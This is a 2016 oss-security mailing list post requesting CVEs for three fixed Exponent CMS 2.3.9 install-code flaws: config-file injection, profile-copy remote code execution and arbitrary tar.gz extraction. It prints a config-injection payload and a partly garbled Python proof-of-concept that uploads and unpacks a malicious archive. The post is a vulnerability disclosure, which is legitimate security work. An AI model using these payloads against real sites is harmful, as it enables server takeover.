Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Thu, 22 Sep 2016 21:35:46 +0800
From: Carl Peng <>
Subject: CVE Request - Exponent CMS 2.3.9 multi-vulnerabilities in install code

Hi , I reported the following vulnerabilities in the install code to the
ExponentCMS team some days ago and fixed now.

1. Arbitrary code execution
lines 56 - 63
if (isset($_REQUEST['sc'])) {
    if (file_exists("../framework/conf/config.php")) {
        // Update the config
        foreach ($_REQUEST['sc'] as $key => $value) {
//            $value = expString::sanitize($value);
            expSettings::change($key, $value);
The function of the expSettings::change() is to modify the config
file("framework/conf/config.php"), but there is failed to filter user input
lead to we could write anything to config file.

Proof of concept:[SMTP_PORT]=25\\');phpinfo();//
  phpinfo() will be executed.
Visit "[SMTP_PORT]=25 " can
be recovery it.

2. RCE vulnerability
if (isset($_REQUEST['profile'])) {
    expSettings::activateProfile($_REQUEST['profile']); //here
    expTheme::removeSmartyCache(); //FIXME is this still necessary?
    flash('message', gt("New Configuration Profile Loaded"));
    header('Location: ../index.php');
expSettings::activateProfile() :
copy(BASE . "framework/conf/profiles/$profile.php", BASE .
"framework/conf/config.php"); //here
// tag it with the profile name
$fh = fopen(BASE . "framework/conf/config.php", "a");
We can upload a "php" file to website, then copy it to

Proof of concept:
first, We first upload a "php" to website (by “uploader_paste.php”), such
as /files/test.php
then visit,
then will copy "/files/test.php" to "framework/conf/config.php".

3. File Upload vulnerability
$files = BASE . "themes/" . DISPLAY_THEME_REAL . "/" .
$_REQUEST['install_sample'] . ".tar.gz";
if (!file_exists($files)) {
    $files = BASE . "install/samples/" . $_REQUEST['install_sample'] .
".tar.gz"; //here
if (file_exists($files)) { // only install if there was an archive
    include_once(BASE . 'external/Tar.php');
    $tar = new Archive_Tar($files); //Extract .tar.gz file
    $return = $tar->extract(BASE);
The function of those code is extract .tar.gz file, but through
"install_sample", the parameter of "$files" is what we can control, so we
could upload a .tar.gz evil file, then extract it.

Proof of concept:
first, upload .eql and .tar.gz files(by “uploader_paste.php”),such as
then visit
Successfully extract file:

python poc code:
import random
import requests
host = ''

def upload(name, url):
files = {'upload' : (name, open('evil.tar.gz'))}
resp =, files=files)
return resp.content

if 'http://' not in host: host = 'http://{}'.format(host)

host = host.rstrip('/')
url = '{}/framework/modules/file/connector/uploader_paste.php'.format(host)
rstr = random.randint(10,99)

req_eql = upload('{}.eql'.format(rstr), url)
req_tar = upload('{}.tar.gz'.format(rstr), url)

if 'tar.gz' in req_tar:
req_inc =

evilfile = '{}/3.php'.format(host)
req_ = requests.get(evilfile)

if 'GIF89a' in req_.content:
print evil-file

And now, all vulnerabilities have been fixed.

these issues was reported by Peng Hua of Inc. and I would
to request  CVEs for these issues (if not done so).


Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.